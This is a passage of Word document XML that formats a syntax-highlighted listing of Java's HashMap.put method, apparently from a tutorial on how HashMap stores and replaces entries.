    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> hash = hash(key.hashCode());  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> i = indexFor(hash, table.length);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (Entry&lt;K,V&gt; e = table[i]; e != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>; e = e.next) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>           Object k;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>           </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (e.hash == hash &amp;&amp; ((k = e.key) == key || key.equals(k))) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>               V oldValue = e.value;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>               e.value = value;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>               e.recordAccess(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>               </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> oldValue;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>           }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>       }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>       modCount++;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>       addEntry(hash, key, value, i);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>   }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="008A2AD9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
